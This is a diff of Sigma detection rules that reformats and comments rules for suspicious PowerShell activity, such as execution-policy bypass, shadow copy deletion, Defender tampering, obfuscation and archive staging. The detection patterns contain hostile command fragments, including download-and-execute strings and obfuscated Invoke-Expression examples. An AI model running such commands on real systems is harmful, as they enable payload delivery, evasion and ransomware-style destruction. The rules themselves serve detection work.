id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: test description: Detects PowerShell scripts to set the ACL to a file in the Windows folder references: @@ -25,24 +25,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cmdlet: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-Acl ' - '-AclObject ' selection_paths: - CommandLine|contains: + # Note: Add more suspicious paths + CommandLine|contains: - -Path "C:\Windows - -Path 'C:\Windows - -Path %windir% - -Path $env:windir selection_permissions: - CommandLine|contains: + # Note: Add more suspicious permissions + CommandLine|contains: - FullControl - Allow condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml index fc16ea20d..2acf57223 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml @@ -1,15 +1,14 @@ title: Change PowerShell Policies to an Insecure Level id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # ScriptBlock + type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry + type: similar status: test -description: Detects changing the PowerShell script execution policy to a potentially - insecure level using the "-ExecutionPolicy" flag. +description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 @@ -30,19 +29,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_option: - CommandLine|contains: + CommandLine|contains: - '-executionpolicy ' - ' -ep ' - ' -exec ' selection_level: - CommandLine|contains: + CommandLine|contains: - Bypass - Unrestricted condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml index 9cf9a42f6..280d30fcf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via PowerShell Set-Service id: 62b20d44-1546-4e61-afce-8e175eb9473c status: test -description: Detects the use of the PowerShell "Set-Service" cmdlet to change the - startup type of a service to "disabled" or "manual" +description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \powershell.exe - - OriginalFileName: PowerShell.EXE + - Image|endswith: \powershell.exe + - OriginalFileName: PowerShell.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - Set-Service - -StartupType - CommandLine|contains: + CommandLine|contains: - Disabled - Manual condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml index 98b077c40..5a582af48 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml @@ -1,14 +1,12 @@ title: Deletion of Volume Shadow Copies via WMI with PowerShell id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 related: - - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e - type: derived - - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 - type: similar + - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e + type: derived + - id: c1337eb8-921a-4b59-855b-4ba188ddcc42 + type: similar status: test -description: Detects deletion of Windows Volume Shadow Copies with PowerShell code - and Get-WMIObject. This technique is used by numerous ransomware families such - as Sodinokibi/REvil +description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html @@ -27,15 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_get: - CommandLine|contains: + CommandLine|contains: - Get-WmiObject - gwmi - Get-CimInstance - gcim selection_shadowcopy: - CommandLine|contains: Win32_Shadowcopy + CommandLine|contains: Win32_Shadowcopy selection_delete: - CommandLine|contains: + CommandLine|contains: - .Delete() - Remove-WmiObject - rwmi diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml index cbf5bb4c9..ad1aabb49 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml @@ -1,8 +1,7 @@ title: Exchange PowerShell Snap-Ins Usage id: 25676e10-2121-446e-80a4-71ff8506af47 status: experimental -description: Detects adding and using Exchange PowerShell snap-ins to export mailbox - data. As seen used by HAFNIUM and APT27 +description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -24,22 +23,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: Add-PSSnapin + CommandLine|contains: Add-PSSnapin selection_module: - CommandLine|contains: + CommandLine|contains: - Microsoft.Exchange.Powershell.Snapin - Microsoft.Exchange.Management.PowerShell.SnapIn filter_msiexec: + # ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000 ParentImage: C:\Windows\System32\msiexec.exe - CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) - -ErrorVariable exerr 2> $null + CommandLine|contains: $exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml index a89d17f07..cd4955f41 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via PowerShell Stop-Service id: c49c5062-0966-4170-9efd-9968c913a6cf related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -19,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc_net_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Image|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe selection_cli: - CommandLine|contains: 'Stop-Service ' + CommandLine|contains: 'Stop-Service ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml index 995e8fca7..dcf99b318 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml @@ -40,12 +40,10 @@ detection: - \wmic.exe - \wscript.exe filter_optional_amazon: - ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ - CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ + ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces + CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - - Some false positive is to be expected from PowerShell scripts that might make - use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional - filters for those scripts when needed. + - Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml index b32b70a75..e04da2133 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml @@ -1,12 +1,10 @@ title: Suspicious PowerShell Download and Execute Pattern id: e6c54d94-498c-4562-a37c-b469d8e9a275 related: - - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 - type: derived + - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 + type: derived status: test -description: Detects suspicious PowerShell download patterns that are often used in - malicious scripts, stagers or downloaders (make sure that your backend applies - the strings case-insensitive) +description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) references: - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html @@ -25,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: # make sure that your backend applies the strings case-insensitive - IEX ((New-Object Net.WebClient).DownloadString - IEX (New-Object Net.WebClient).DownloadString - IEX((New-Object Net.WebClient).DownloadString diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml index 25112d740..83834a94e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml @@ -4,8 +4,7 @@ status: test description: Detects suspicious PowerShell invocation with a parameter substring references: - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier -author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez - (Fix) +author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) date: 2019/01/16 modified: 2022/07/14 tags: @@ -23,7 +22,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -windowstyle h ' - ' -windowstyl h' - ' -windowsty h' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml index 2a88c229d..ec63c797c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Parent Process id: 754ed792-634f-40ae-b3bc-e0448d33f695 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: derived + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: derived status: test description: Detects a suspicious or uncommon parent processes of PowerShell references: @@ -22,43 +22,43 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: - - ParentImage|contains: tomcat - - ParentImage|endswith: - - \amigo.exe - - \browser.exe - - \chrome.exe - - \firefox.exe - - \httpd.exe - - \iexplore.exe - - \jbosssvc.exe - - \microsoftedge.exe - - \microsoftedgecp.exe - - \MicrosoftEdgeSH.exe - - \mshta.exe - - \nginx.exe - - \outlook.exe - - \php-cgi.exe - - \regsvr32.exe - - \rundll32.exe - - \safari.exe - - \services.exe - - \sqlagent.exe - - \sqlserver.exe - - \sqlservr.exe - - \vivaldi.exe - - \w3wp.exe + - ParentImage|contains: tomcat + - ParentImage|endswith: + - \amigo.exe + - \browser.exe + - \chrome.exe + - \firefox.exe + - \httpd.exe + - \iexplore.exe + - \jbosssvc.exe + - \microsoftedge.exe + - \microsoftedgecp.exe + - \MicrosoftEdgeSH.exe + - \mshta.exe + - \nginx.exe + - \outlook.exe + - \php-cgi.exe + - \regsvr32.exe + - \rundll32.exe + - \safari.exe + - \services.exe + - \sqlagent.exe + - \sqlserver.exe + - \sqlservr.exe + - \vivaldi.exe + - \w3wp.exe selection_powershell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - CommandLine|contains: - - /c powershell - - /c pwsh - - Description: Windows PowerShell - - Product: PowerShell Core 6 - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - CommandLine|contains: + - /c powershell # FPs with sub processes that contained "powershell" somewhere in the command line + - /c pwsh + - Description: Windows PowerShell + - Product: PowerShell Core 6 + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - Other scripts diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml index 62b23dc0b..d93d4682d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml @@ -1,8 +1,7 @@ title: PowerShell Script Run in AppData id: ac175779-025a-4f12-98b0-acdaeb77ea85 status: test -description: Detects a suspicious command line execution that invokes PowerShell with - reference to an AppData folder +description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder references: - https://twitter.com/JohnLaTwC/status/1082851155481288706 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 @@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - powershell.exe - \powershell - \pwsh - pwsh.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '/c ' - \AppData\ - CommandLine|contains: + CommandLine|contains: - Local\ - Roaming\ condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml index 36b528916..5279d7304 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml @@ -1,8 +1,7 @@ title: PowerShell DownloadFile id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5 status: test -description: Detects the execution of powershell, a WebClient object creation and - the invocation of DownloadFile in a single command line +description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html author: Florian Roth (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .DownloadFile - System.Net.WebClient diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml index bf772dd80..a5d432829 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 related: - - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 - type: similar + - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 + type: similar status: test -description: Detects attempts to remove Windows Defender configurations using the - 'MpPreference' cmdlet +description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_remove: - CommandLine|contains: Remove-MpPreference + CommandLine|contains: Remove-MpPreference selection_tamper: - CommandLine|contains: + CommandLine|contains: - '-ControlledFolderAccessProtectedFolders ' - '-AttackSurfaceReductionRules_Ids ' - '-AttackSurfaceReductionRules_Actions ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml index c213445a7..08e7a9f60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Process Creation id: deb9b646-a508-44ee-b7c9-d8965921c6b6 related: - - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 - type: similar + - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 + type: similar status: test description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: @@ -22,9 +22,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] - - CommandLine|re: '"(\{\d\})+"\s*-f' - - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] + # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - CommandLine|re: '"(\{\d\})+"\s*-f' + - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml index bd8b906b4..2fbc4813c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml @@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet id: 1114e048-b69c-4f41-bc20-657245ae6e3f related: - - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 - type: similar + - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -24,17 +23,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADUser ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -42,7 +41,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml index ba1a38bf9..4be149725 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml @@ -1,9 +1,7 @@ title: Net WebClient Casing Anomalies id: c86133ad-4725-4bd0-8170-210788e0a7ba status: test -description: Detects PowerShell command line contents that include a suspicious abnormal - casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation - techniques +description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -21,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_encoded: - CommandLine|contains: + CommandLine|contains: - TgBlAFQALgB3AEUAQg - 4AZQBUAC4AdwBFAEIA - OAGUAVAAuAHcARQBCA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml index 538f4deb0..38a4c5eb6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml @@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Process Creation id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 related: - - id: 504d63cb-0dba-4d02-8531-e72981aace2c - type: similar + - id: 504d63cb-0dba-4d02-8531-e72981aace2c + type: similar status: test description: Detect use of X509Enrollment references: @@ -23,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - X509Enrollment.CBinaryConverter - 884e2002-217d-11da-b2a4-000e7bbb2b09 condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml index 5e335765c..77593ee0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml @@ -1,8 +1,8 @@ title: Suspicious XOR Encoded PowerShell Command id: bb780e0c-16cf-4383-8383-1e5471db6cf9 related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: obsoletes + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: obsoletes status: test description: Detects presence of a potentially xor encoded powershell command references: @@ -10,8 +10,7 @@ references: - https://redcanary.com/blog/yellow-cockatoo/ - https://zero2auto.com/2020/05/19/netwalker-re/ - https://mez0.cc/posts/cobaltstrike-powershell-exec/ -author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, - oscd.community, Nasreddine Bencherchali +author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali date: 2018/09/05 modified: 2023/01/30 tags: @@ -29,18 +28,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows PowerShell - - Product: PowerShell Core 6 + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows PowerShell + - Product: PowerShell Core 6 selection_cli_xor: - CommandLine|contains: bxor + CommandLine|contains: bxor selection_cli_other: - CommandLine|contains: + CommandLine|contains: - ForEach - for( - 'for ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml index 9b6fba1e4..2f18edfb9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml @@ -1,22 +1,16 @@ title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a @@ -35,7 +29,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Compress-Archive -Path*-DestinationPath $env:TEMP - Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\ - Compress-Archive -Path*-DestinationPath*:\Windows\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml index 158053d70..5932e69ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via PresentationHost.EXE id: b124ddf4-778d-418e-907f-6dd3fc0d31cd status: test -description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" - (Browser Applications) files to download arbitrary files +description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - 